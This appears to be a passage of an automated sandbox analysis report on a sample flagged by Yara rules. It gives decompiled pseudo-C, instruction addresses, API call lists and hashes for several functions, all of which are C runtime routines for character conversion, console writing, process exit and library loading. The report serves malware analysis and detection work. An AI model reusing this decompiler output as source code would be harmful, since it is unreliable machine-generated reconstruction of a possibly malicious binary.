				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x9573097c
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























            0x004078d4
            0x004078d5
            0x004078d6
            0x004078dd
            0x004078e2
            0x004078e8
            0x004078ee
            0x004078f4
            0x004078f7
            0x004078f7
            0x004078fa
            0x004078fc
            0x004078fc
            0x004078fa
            0x004078fe
            0x00407903
            0x0040790a
            0x0040790d
            0x0040790d
            0x00407929
            0x0040792f
            0x00407934
            0x00407ac7
            0x00407ad2
            0x00407ada
            0x0040793a
            0x0040793a
            0x0040793d
            0x00407942
            0x00407946
            0x0040799a
            0x0040799a
            0x0040799c
            0x0040799e
            0x00407abc
            0x00407abc
            0x00407abe
            0x00407abf
            0x00407ac5
            0x00000000
            0x00407ac5
            0x004079af
            0x004079b5
            0x004079b7
            0x00000000
            0x00000000
            0x004079bd
            0x004079cf
            0x004079d4
            0x004079d8
            0x00000000
            0x00000000
            0x004079e5
            0x00407a1f
            0x00407a22
            0x00407a25
            0x00407a27
            0x00407a29
            0x00407a2b
            0x00407a77
            0x00407a77
            0x00407a79
            0x00407a79
            0x00407a7b
            0x00407ab5
            0x00407ab6
            0x00000000
            0x00407abb
            0x00407a8f
            0x00407a94
            0x00407a96
            0x00000000
            0x00000000
            0x00407a9a
            0x00407a9b
            0x00407a9c
            0x00407a9f
            0x00407adb
            0x00407ade
            0x00407aa1
            0x00407aa1
            0x00407aa2
            0x00407aa2
            0x00407aaf
            0x00407ab1
            0x00407ab3
            0x00407ae4
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00407ab3
            0x00407a2d
            0x00407a30
            0x00407a32
            0x00407a34
            0x00407a36
            0x00407a39
            0x00407a3e
            0x00407a59
            0x00407a5b
            0x00407a65
            0x00407a67
            0x00407a68
            0x00407a6a
            0x00000000
            0x00000000
            0x00407a6c
            0x00407a72
            0x00407a72
            0x00000000
            0x00407a72
            0x00407a40
            0x00407a42
            0x00407a46
            0x00407a4b
            0x00407a4d
            0x00407a4f
            0x00000000
            0x00000000
            0x00407a51
            0x00000000
            0x00407a51
            0x004079e7
            0x004079ec
            0x00000000
            0x00000000
            0x004079f2
            0x004079f4
            0x00000000
            0x00000000
            0x00407a10
            0x00407a14
            0x00000000
            0x00000000
            0x00000000
            0x00407a1a
            0x0040794d
            0x0040794f
            0x00407951
            0x00407959
            0x00407978
            0x0040797a
            0x00407984
            0x00407986
            0x00407987
            0x00407989
            0x00000000
            0x00000000
            0x0040798f
            0x00407995
            0x00407995
            0x00000000
            0x00407995
            0x0040795d
            0x00407961
            0x00407966
            0x0040796a
            0x00000000
            0x00000000
            0x00407970
            0x00000000
            0x00407970

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x9573097c
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































            0x0040822b
            0x00408232
            0x00408235
            0x0040823d
            0x00408241
            0x0040824d
            0x00408250
            0x00408253
            0x0040825a
            0x00408262
            0x00408265
            0x0040826b
            0x00408271
            0x00408276
            0x00408278
            0x0040827b
            0x00408280
            0x0040828a
            0x00408291
            0x00408294
            0x0040829b
            0x004082a2
            0x004082ce
            0x004082f4
            0x004082f6
            0x00000000
            0x004082d0
            0x004082d3
            0x0040839a
            0x004083a6
            0x004083b1
            0x004083b6
            0x004082d9
            0x004082e0
            0x004082e5
            0x004082eb
            0x004082f1
            0x00000000
            0x004082f1
            0x004082eb
            0x004082d3
            0x004082a4
            0x004082a8
            0x004082ab
            0x004082b1
            0x004082b3
            0x004082b6
            0x004082ba
            0x004082f7
            0x004082fa
            0x004082fb
            0x00408300
            0x00408306
            0x0040830c
            0x0040831b
            0x00408321
            0x00408327
            0x0040832c
            0x00408348
            0x004083bb
            0x004083c1
            0x0040834a
            0x00408352
            0x0040835b
            0x00408361
            0x00000000
            0x00408363
            0x00408365
            0x00408368
            0x00408381
            0x00000000
            0x00408383
            0x00408387
            0x00408389
            0x0040838c
            0x00000000
            0x0040838c
            0x00408387
            0x00408381
            0x00408361
            0x0040835b
            0x00408348
            0x0040832c
            0x00408306
            0x00000000
            0x0040838f
            0x0040838f
            0x004083c3
            0x004083cd
            0x004083d5

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x9573097c
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









            0x00403639
            0x00403640
            0x00403643
            0x00403647
            0x00403652
            0x0040365a
            0x00403665
            0x0040366b
            0x0040366f
            0x00403676
            0x0040367c
            0x0040367c
            0x0040367e
            0x00403683
            0x00403688
            0x00403688
            0x00403693
            0x0040369b

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x9573097c
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























            0x004062c0
            0x004062c7
            0x004062ca
            0x004062d3
            0x004062d8
            0x004062dd
            0x004062e2
            0x004062e5
            0x004062e7
            0x004062e7
            0x004062ec
            0x00406305
            0x0040630b
            0x00406310
            0x004063af
            0x004063b3
            0x004063b8
            0x004063b8
            0x004063cc
            0x004063d4
            0x004063d4
            0x00406316
            0x00406319
            0x0040631e
            0x00406322
            0x0040636e
            0x00406370
            0x00406372
            0x00406377
            0x0040638e
            0x00406396
            0x004063a6
            0x004063a6
            0x00406396
            0x004063a8
            0x004063a9
            0x00000000
            0x004063ae
            0x00406324
            0x00406329
            0x0040632b
            0x0040632d
            0x0040632d
            0x00406335
            0x00406352
            0x0040635c
            0x00406361
            0x00000000
            0x00000000
            0x00406363
            0x00406369
            0x00406369
            0x00000000
            0x00406369
            0x00406339
            0x0040633d
            0x00406342
            0x00406346
            0x00000000
            0x00000000
            0x00406348
            0x00000000

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x6d7b68
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







            0x00409be4
            0x00409bf1
            0x00409bf7
            0x00409bff
            0x00409c0d
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00409c15
            0x00409c15
            0x00409c17
            0x00409c29
            0x00000000
            0x00000000
            0x00409c2b
            0x00409c3b
            0x00000000
            0x00000000
            0x00409c43
            0x00409c45
            0x00409c46
            0x00409c5e
            0x00409c65
            0x00000000
            0x00409c73
            0x00000000
            0x00409c6e
            0x00409bff
            0x00409bf3
            0x00409bf3
            0x00000000

            APIs
            • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
            • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
            • __dosmaperr.LIBCMT ref: 00409C68
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CloseErrorHandleLast__dosmaperr
            • String ID: h{m
            • API String ID: 2583163307-1179516498
            • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
            • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x9573097d
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










            0x00405756
            0x0040575a
            0x00405761
            0x00405765
            0x00405773
            0x00405789
            0x0040578d
            0x004057b6
            0x004057b8
            0x004057bc
            0x004057bf
            0x004057bf
            0x004057c5
            0x004057c7
            0x00000000
            0x004057c8
            0x0040578f
            0x00405798
            0x004057a7
            0x0040579a
            0x0040579d
            0x004057a3
            0x004057a3
            0x004057ab
            0x00000000
            0x004057ad
            0x004057b0
            0x004057b2
            0x00000000
            0x004057b2
            0x004057ab
            0x00405767
            0x0040576c
            0x00000000

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
            Download Yara Rule
            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
